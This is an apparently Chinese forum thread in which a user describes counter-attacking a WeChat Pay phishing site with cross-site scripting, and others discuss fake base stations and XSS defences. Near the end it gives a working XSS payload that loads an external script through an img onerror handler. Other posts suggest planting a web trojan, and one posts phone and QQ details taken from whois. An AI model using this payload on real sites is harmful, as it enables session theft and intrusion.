腾讯内部是不是有内鬼啊，刚刚申请了微信支付，结果就发来诈骗短信

只能说有些人太好骗了

火钳刘明
这个是大新闻

"放蛇“（钓鱼执法） ……

我现在已经把上面被盗的信息全部给他删完了。。

取款密码......

第一眼就看到了域名错误。

查了下 whois ，貌似是在上海祥和路，电话： 0215822656 ， qq: 395849573958

我只说两个字，求教。

@TangMonk 这是蛇皮 QQ 。现在的新 QQ 都这么长了啊。。。。

他在哪个页面中了你的 xss

所以说啊，还是老老实实用 PHP

@sorcerer 输入手机号的页面啊。。。

转型 php 最好语言贴……

大哥，受我一拜，好人啊。()

@815lbh

求教程

楼主干的漂亮
感觉把对方服务器肉鸡了
或者重定向到某榴… 更刺鸡

@hlg002 https://www.google.com/search?q=xss+%E6%95%99%E7%A8%8B&{google:acceptedSuggestion}oq=xss+%E6%95%99%E7%A8%8B&aqs=chrome..69i57.2076j0j7&sourceid=chrome&ie=UTF-8

楼主好人

php 我学还不行吗

@TangMonk 我在 inpuit 输入 <script>alert(123);</script> 和 get 都不行

楼主 666 ，再低劣的骗术也有人中招

顶楼主 现在社会需要你这样正直的人

@hlg002 你输入了以后就提交上去了,如过真的有漏洞,就是在他的管理页面会弹出`123`了

@hlg002 那可能是对 script 标签过滤了吧

你用了 wifi 没还是用的自己的网络？

大家跟进看什么原因

@KenGe 用的 wifi, 怎么了？

@TangMonk 自己检查下吧~ 先别下定义

看网址 应该能看出不对头……学习了

哈哈，骗子反被楼主骗了。
骗子：哼哼哼，骗子！

95017 确实是腾讯的客服电话吧。城里套路真是深啊

如果你在收到短信前，有短时间手机突然没信号，那有可能是伪基站发的短信。

数据库挂了还是本来就会错误

Microsoft JET Database Engine 错误 '80004005'

未指定的错误

/include/db_conn.asp ，行 36




他的数据库被人玩坏了。。。

@TangMonk good job

问题是...95017 确实是微信的客服号码，这个怎么弄的？

@subpo 基站伪装呀....以前电信诈骗的时候,各种短信都是银行的号

@mgna17 随手注入 健康你我他…

@itqls 哪有这么巧？ 知道了住址，还要连夜赶过去？

楼主做了一件大好事。

马云：祝各位阿 sir 在警察部一帆风顺。干杯！

太暴力，后台登录挂个网马撸出来照片或者视频最好

伪基站的话应该是撒网捞鱼的。碰巧遇到楼主，腾讯背了锅。

@hahiru 那还不如撒 银行的网

@hahiru 科技园区 有可能

是不是手机里软件有问题。。

基站伪装

这个重点不是内鬼

= =,伪基站 去科技园撒网 专门调微信开发者... 这不太现实吧 而且注册也就一次的事情

得到微信内部查查是谁卖的了

没有人吐槽“登陆”的么（滑稽）

@dahvlh
感觉更不现实的是
知道你刚 申请微信支付 ，拿到你的 地址，跑到你身边架一个伪基站，恰好你又能收到

@wenymedia 1024 的这个好，帮我刷点贡献吧……

我去 贴主~很 知道放 xss~~ 不仔细看 真的以为是腾讯发来的~~

@nfroot 嘘 不要走漏了风声

牛掰，果然 php 才是王道。

@zhouyg 我要来推广下 ruby , 哈哈

应该是伪基站群发了短信，恰好赶上你微信支付了。

围观

@Patrick95 但是我周围的朋友没有收到短信

厉害了我的楼主

可以查一下详单来分辨是不是伪基站，注意短彩信和增值业务都要查，因为有些增值业务也能发短信。

wap.weixtqq.com 这不摆明说是假的么

层主说的对 感觉有点像伪基站发的~~

腾讯企业验证费用和验证是交给第三方做的, 这个第三方有重大嫌疑

@j8sec 原来如此！什么公司啊？

过两天去查详单 看看到底是不是伪基站

申请微信支付有可能不是腾讯，而是第三方审核所在的公司。

强,无敌!

Good job ！事关广大人民群众安全，建议向当地公安报案，并向腾讯安全应急响应中心报告。

哈哈哈 干的漂亮

厉害，自己还是要加强学习啊~

难怪现在可以通过对公账户打款来验证，看来第三方确实不安全，还得交 300 大洋=。=

能不能写写入侵流程

[建议]
1 、用个插件自定义你的 UA （例如插入几个字符），大家写后台的时候在统一入口验证 UA 如果不包含那几个字符就 404 ，这样能防止 XSS 。 https://ext.se.360.cn/webstore/search/魔变
2 、 session 保存登录的 ip ，每个后台页面打开都判断当前 IP 是否等于登录时记得那个 IP 。

求还有什么方法或者更简便的方法防止被 XSS

如果是伪基站的话，怎么知道谁刚刚开通微信支付，刚好受害者周围部署了伪基站？

说起伪基站，大学时有一阵子只要发查询剩余流量的短信（移动卡）就会收到电信上网卡的推销短信……

@TangMonk 厉害的。。。

楼上的各位，应该是伪基站发送的，我查了下移动的短信详单, 没有 95017 的电话号码：

移动的短信详单：

我的手机收到的短信： （我的手机还"智能"的给短信加了 logo ）

@jookr 对输入的字符中的特殊字符进行转义 . 配置统一的过滤层 .

有没有 xss 代码供学习一下

楼主好样的，佩服

能不能提供一下你的 xss 代码学习一下.

厉害啊厉害，随手注入了一下~

@hoythan
@sola97

https://gist.github.com/TangMonk/aa7463f6ebb2c88e607ee12407b34446

@TangMonk 这个 xss 代码也是我抄别人的。。 :(

去知乎发个帖，搞个大新闻

如果是 iPhone 的截图 回更有说服力

@TangMonk 你这个代码直接通过用户名输入框输入进去的？ 服务端和网页限制一下输入长度是不是就没用了

@ljcarsenal 不是，这只是一个 js 链接包含的内容而已，输入框里面填写

<img src=x Onerror=s=createElement('script');body.appendChild(s);s.src='你的 js 地址'>

应该是伪基站，想骗普通吃瓜群众，骗到程序员是因为他倒霉

第一眼就发现域名有问题啊

你看这 whois ，绝对坑你没商量

我不懂，但我觉得你用的是安卓吧？

nice ！干得不错

这个是针对个人的微信支付来诈骗的吧，任何人收到都可能受骗啊，基本有微信的都开了微信支付吧，只是你收到短信的时间比较巧吧

你的手机什么 rom ！！！ 太干扰人了

@zhangsimon 一加 2 。。氢 os

next page>